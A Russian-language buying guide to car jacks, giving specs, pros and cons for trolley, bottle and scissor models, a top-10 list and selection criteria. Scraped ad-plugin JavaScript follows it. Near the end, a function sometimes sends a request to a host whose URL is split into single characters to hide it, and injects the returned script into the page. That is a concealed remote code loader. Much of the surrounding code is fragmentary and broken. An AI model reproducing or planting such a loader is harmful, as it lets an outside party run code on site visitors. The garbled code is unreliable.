Грузоподъемное устройство – подкатной домкрат, модель Torin T830020. Основные функции: подъем, фиксация, удержание транспортного средства при проведении диагностики и ремонта машины. Максимальная грузоподъемность данного домкрата равна 3000 кг, высота подъема/подхвата – 410/135 мм соответственно. В конструкцию входят: поворотная рама, металлические колеса, одинарная складная ручка.

  • Возможность подъема машин с низким клиренсом.
  • Мобильность, устойчивость конструкции.
  • Прорезиненная рукоятка.
  • Плавный ход при выполнении подъема грузов.
  • Долговечность устройства.
  • Антикоррозионное покрытие корпуса.
  • Универсальность применения (в мастерской, гараже).

AIR KRAFT DPA2C (Турция)

При использовании подкатного пневматического подъемника не требуются сверхвысокие физические усилия человека. Принцип действия пневмодомкрата AIR KRAFT DPA2C основан на использовании энергии сжатого воздуха внутри специальной камеры из эластичных материалов. Область использования: станции техобслуживания, частные гаражи.

  • Высокое качество изготовления.
  • Устойчивая платформа.
  • Увеличенная площадь подхвата.
  • Устройство устанавливается в самых труднодоступных местах.
  • Поднимает автомобили с минимальным дорожным просветом.
  • Необходимо иметь в гараже воздушный компрессор не менее 6 атмосфер.

Miol 80-245

Мобильный гаражный домкрат Miol 80-245 отлично справляется с подъемов легковых автомобилей и других грузов весом не более трех тонн. В конструкцию входит одинарная ручка, поворачивающаяся вокруг своей оси на 360 градусов, что очень удобно для работы подкатного механизма в условиях небольшого гаража.

  • Удобство пользования.
  • Съемная рукоятка с обрезиненной ручкой.
  • Надежность, прочность, долговечность.
  • Мобильность.
  • Универсальность.
  • Достаточная высота подъема.
  • Не совсем качественное крепление рычага (часто соскакивает).
  • Ненадежная картонная упаковка.
  • Отсутствие резиновой накладки на подъемнике.

BELAUTO DP33

Подкатной гидравлический домкрат BELAUTO DP33 пользуется популярностью среди профессиональных автомехаников. Данную модель чаще всего можно встретить в мастерских по шиномонтажу, а также на многих СТО. Устройство предназначено для подъема транспортных средств и прочих грузов весом не более 3-х тонн.

  • Повышенное качество изготовления.
  • Безопасность эксплуатации, удобство.
  • Легкий быстрый подъем груза.
  • Простота конструкции, надежность, долговечность прибора.
  • Удобная рукоятка.
  • Ремонтопригодность.
  • Эффективность.
  • Устойчивость против перегрузок и неблагоприятных условий: повышенной влажности, механических ударов, коррозии, перепадов температур.
  • Отсутствие люфта.

Лучшие домкраты для кроссовера

MATRIX MASTER 51028

Домкрат гидравлический MATRIX MASTER 51028 – надежный помощник владельцев кроссоверов, минивэнов и других моделей легковых автомобилей. Агрегат подкатного типа обладает компактными размерами, в то же время способен поднимать грузы до 2000 кг на максимальную высоту в 385 мм.

  • Бюджетная стоимость.
  • Надежность конструкции, безопасность, удобство пользования.
  • Корпус отличается прочностью, устойчивостью против коррозии.
  • Изделие комплектуется удобным кейсом для хранения и транспортировки.
  • Мобильность, точность установки (колеса – 4 шт.).
  • Гидравлика с защитным клапаном от возможных перегрузок и поломок.
  • В конструкции не хватает резиновой накладки на опорной поверхности.

Compac 2T-77

Принцип действия данной модели – гидравлический механизм. Домкрат Compac 2T-77 изготовлен в Дании. Конструкция подкатная рассчитана на подъем транспортных средств весом до двух тонн с очень низким дорожным просветом (клиренсом) – 77 мм. Благодаря удобной ножной педали насоса любая машина, в т. ч. кроссовер, легко и быстро поднимается на необходимую высоту.

  • Компактность.
  • Высокое качество изготовления.
  • Надежность фиксации груза.
  • Долговечность изделия.
  • Гарантия от производителя.
  • Отличные технические характеристики.

Torin T82256

Автомобильный домкрат Torin T82256 отлично справляется грузами до 2-х тонн. Среди владельцев кроссоверов и других внедорожников данная модель пользуется популярностью благодаря качественному исполнению, выполнению заявленных функций. Модель T82256 рассчитана на поднятие груза на высоту 135 – 440 мм при высоте подхвата в 135 мм.

  • Адекватная цена.
  • Отличное качество сборки.
  • Грузоподъемность более двух тонн (2,25т).
  • Компактность.
  • Мобильность.
  • Универсальность.
  • Удобство пользования.

Лучшие бутылочные домкраты для легкового автомобиля

Intertool GT0029

Конструкция для тяжеловесов, предназначена для поднятия транспортных средств весом до 35 тонн на высоту 25,5 – 41,5 см. Домкрат Intertool GT0029 с одним штоком – яркий представитель подъемных гидравлических устройств бутылочного типа. В комплект к домкрату прилагается съемная удлиняющая рукоятка- рычаг.

  • Сравнительно небольшая стоимость изделия.
  • Увеличенная грузоподъемность.
  • Удобство работы.
  • Хромированное покрытие выдвижного штока.
  • Компактность конструкции.
  • Поднятие машины производится на непродолжительное время (чтобы продлить удержание груза на высоте, необходимо использовать специальные подставки).

Armer ARM16

Вертикальный домкрат бутылочный изготовлен в Китае. Одноштоковая модель Armer ARM16 предназначена для поднятия грузов весом не более 16 тонн. Высота подъема равна 435 мм, рассчитан на тяжеловесные машины с клиренсом не ниже 230 мм. Подъемная площадка выполнена из прочной стали.

  • Приемлемая цена на изделие.
  • Малые габариты, вес домкрата (7,7 кг).
  • Легкое поднятие грузов при помощи гидравлического механизма путем воздействия на рычаг.
  • Устройство упаковано в ненадежную картонную коробку.

Lavita LA JNS-03

Удобное подъемное устройство – незаменимый помощник многих автовладельцев. Модель Lavita LA JNS-03 – бутылочный вертикальный домкрат, изделие работает на основе гидравлики. С помощью LA JNS-03 мастера поднимают машины до 3-х тонн для проведения диагностики и ремонта транспортного средства.

  • Бюджетный вариант.
  • Маленький вес изделия равен 2,2 кг.
  • Надежность.
  • Компактность.
  • Мобильность.
  • Длительный эксплуатационный срок.
  • Удобство пользования.
  • Пластмассовый кейс.

Какой домкрат лучше выбрать для своего авто

Чтобы выбрать домкрат оптимальной формы и конструкции, необходимо определиться, какие функции должно выполнять подъемное устройство. Основные критерии выбора нового домкрата: с каким весом работает данное изделие, сколько стоит, кто является производителем выбранной модели.

При этом также нужно учитывать характеристики вашего транспортного средства: вес авто, дорожный просвет, конфигурация площадки на днище машины. Новый домкрат должен иметь оптимальные размеры в сложенном виде, чтобы поместиться в багажник.

Как выбрать домкрат?

Домкрат — это инструмент, который должен быть у любого уважающего себя автомобилиста. Он поможет в случае чего поднять вашу машину и, скажем, заменить колесо, а также провести множество других ремонтных работ.

Рынок домкратов очень разнообразен, и на нем присутствует множество производителей. Какую же модель выбрать? Ведь нужно купить именно тот домкрат, который в критический не подведет и справится со своей задачей на твердую «пятерку» по пятибалльной шкале.

В следующем разделе мы расскажем обо всех важных технических характеристиках домкратов, которые влияют на их функционал и полезность, а затем представим вашему вниманию десять интересных моделей, которые можно приобрести у магазинов в нашем каталоге.

Главные характеристики, на которые стоит обратить внимание

Вид

Популярных видов домкратов четыре: бутылочный, подкатной, ромбовый и реечный.

Бутылочные модели формой напоминают бутылку и используют для подъема автомобиля гидравлику. Обычно это весьма грузоподъемные и эффективные инструменты, которые точно фиксируют высоту и поднимают всю конструкцию достаточно плавно. Главный недостаток бутылочных домкратов — необходимость их транспортировки в вертикальном положении из-за возможной утечки гидравлической жидкости. Кроме того, они отличаются большой высотой подхвата.

Подкатные домкраты похожи на маленькие тележки, а для подъема используют пневматику, гидравлику или пневмогидравлику. Они тоже обычно могут поднять большую массу и при этом удобны в использовании даже в стесненных условиях небольшого гаража. С другой стороны, такие инструменты относительно много весят, а использовать их (в соответствии с ТБ) можно только на очень ровной поверхности.

Ромбовые модели оснащены рамкой, которая поднимается или опускается путем вращения винта. Это дешевые и не слишком эффективные домкраты, которые справятся с легковыми авто, но для подъема придется приложить немало усилий.

Наконец, реечные дократы имеют стойку с прорезями и зацеп с ручкой или рычагом. Они могут поднять машину весьма высоко и удобны для применения даже в условиях бездорожья, но весьма громоздки. Обычно реечные модели используют владельцы грузовиков, внедорожников и других крупногабаритных машин.

Тип механизма

Подавляющее большинство домкратов используют для работы механизма гидравлические системы. Такая система предполагает простое нажатие на педаль или вращение рукояти. Больших усилий прикладывать не придется, но гидравлические домкраты заметно дороже и тяжелее других.

Винтовые модели используют для подъема усилия, которые прикладывает автомобилист, когда вращает винт. Это простой и дешевый механизм, для работы которого придется немного попотеть. Серьезных недостатков два: не слишком высокая высокая грузоподъемность и недолговечность резьбы.

Третий популярный тип механизма домкратов — пневматический. Он вообще не требует применения физической силы и позволяет поднять авто довольно большой массы, но стоят такие модели гораздо дороже гидравлических.

Грузоподъемность

На упаковке каждого домкрата производитель указывает максимальную массу, которую он способен поднять. Всегда подбирайте конкретную модель с учетом заявленного веса своего автомобиля, сложенного с потенциальным весом груза, иначе можно попасть в беду! Хоть домкрат и поднимает машину только с одной стороны, лучше выбрать такой вариант, который предоставит вам комфортный и безопасный запас.

Высота подъема

У каждого домкрата есть два предела высоты подъема — минимальный и максимальный.

Минимальная высота подъема важна, так как далеко не каждый домкрат может поместиться под любое авто — просвета над площадкой может и не хватить.

Максимальная высота подъема не так критична — все модели способны поднять груз на 30-50 см, чего хватит для замены колеса и других видов быстрого ремонта.

Габариты и вес

Не слишком важный параметр, но обратить внимание на него все же стоит. С тяжелым домкратом справиться в работе будет сложнее, а габариты повлияют на то, как он расположится в вашем багажнике.

Комплектация

В комплекте с некоторыми домкратами поставляются специальные сумки или кейсы для переноски и хранения. Это очень удобно — так инструмент не запачкает лишний раз ваш багажник и будет аккуратно сложен для последующего использования. Если домкрат покупается без такой сумки в комплекте, ее все равно настоятельно рекомендуется приобрести.

Топ-10 домкратов

Autoprofi DG-08

Надежный домкрат из Китая, который имеет перепускной клапан, который в случае чего может повысить грузоподъемность и до 10 тонн.

Особенности:

  • тип: бутылочный
  • тип механизма: гидравлический
  • грузоподъемность: 8 т
  • минимальная высота подъема: 200 мм
  • максимальная высота подъема: 405 мм
  • вес: 5.25 кг

Airline AJ-R-02

Не очень долгосрочный, но дешевый, удобный и устойчивый домкрат российского производителя.

Особенности:

  • тип: ромбовый
  • тип механизма: винтовой
  • грузоподъемность: 2 т
  • минимальная высота подъема: 105 мм
  • максимальная высота подъема: 400 мм
  • сумка в комплекте

Зубр Профи 43056-2

Подкатная модель, которой удобно пользоваться в условиях ограниченного пространства.

Особенности:

  • тип: подкатной
  • тип механизма: гидравлический
  • грузоподъемность: 2 т
  • минимальная высота подъема: 85 мм
  • максимальная высота подъема: 330 мм
  • вес: 10 кг

AVS FJ-2000H

Надежный, долговечный и простой подкатной домкрат, который не пробьет дыру в бюджете.

Особенности:

  • тип: подкатной
  • тип механизма: гидравлический
  • грузоподъемность: 2 т
  • минимальная высота подъема: 133 мм
  • максимальная высота подъема: 385 мм
  • вес: 11.5 кг

FORSAGE TH22501CB

Компактная подкатная модель, которая подойдет для любого легкового автомобиля.

Особенности:

  • тип: подкатной
  • тип механизма: гидравлический
  • грузоподъемность: 2.5 т
  • минимальная высота подъема: 140 мм
  • максимальная высота подъема: 387 мм

Autoprofi DG-10

Чуть более грузоподъемный бутылочный домкрат китайской Autoprofi.

Особенности:

  • тип: бутылочный
  • тип механизма: гидравлический
  • грузоподъемность: 10 т
  • минимальная высота подъема: 200 мм
  • максимальная высота подъема: 405 мм
  • вес: 5.75 кг

FORSAGE F-T83003C

3 тонны для этой небольшой подкатной модели — совсем не проблема.

Особенности:

  • тип: подкатной
  • тип механизма: гидравлический
  • грузоподъемность: 3 т
  • минимальная высота подъема: 130 мм
  • максимальная высота подъема: 410 мм

FORSAGE T92007

Бутылочный домкрат, предназначенный для самых тяжелых средств передвижения.

Особенности:

  • тип: бутылочный
  • тип механизма: гидравлический
  • грузоподъемность: 20 т
  • минимальная высота подъема: 190 мм
  • максимальная высота подъема: 340 мм

RockForce RF-T83006B

Довольно дорогой по сравнению с аналогами, но очень качественный и прочный домкрат RockForce.

Особенности:

  • тип: подкатной
  • тип механизма: гидравлический
  • грузоподъемность: 3 т
  • минимальная высота подъема: 150 мм
  • максимальная высота подъема: 530 мм

Startul Auto ST8020-2

Простое бюджетное решение Startul Auto, предназначенное для тех, кто не хочет переплачивать.

Особенности:

  • тип: ромбовый
  • тип механизма: винтовой
  • грузоподъемность: 2 т
  • минимальная высота подъема: 105 мм
  • максимальная высота подъема: 385 мм
Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика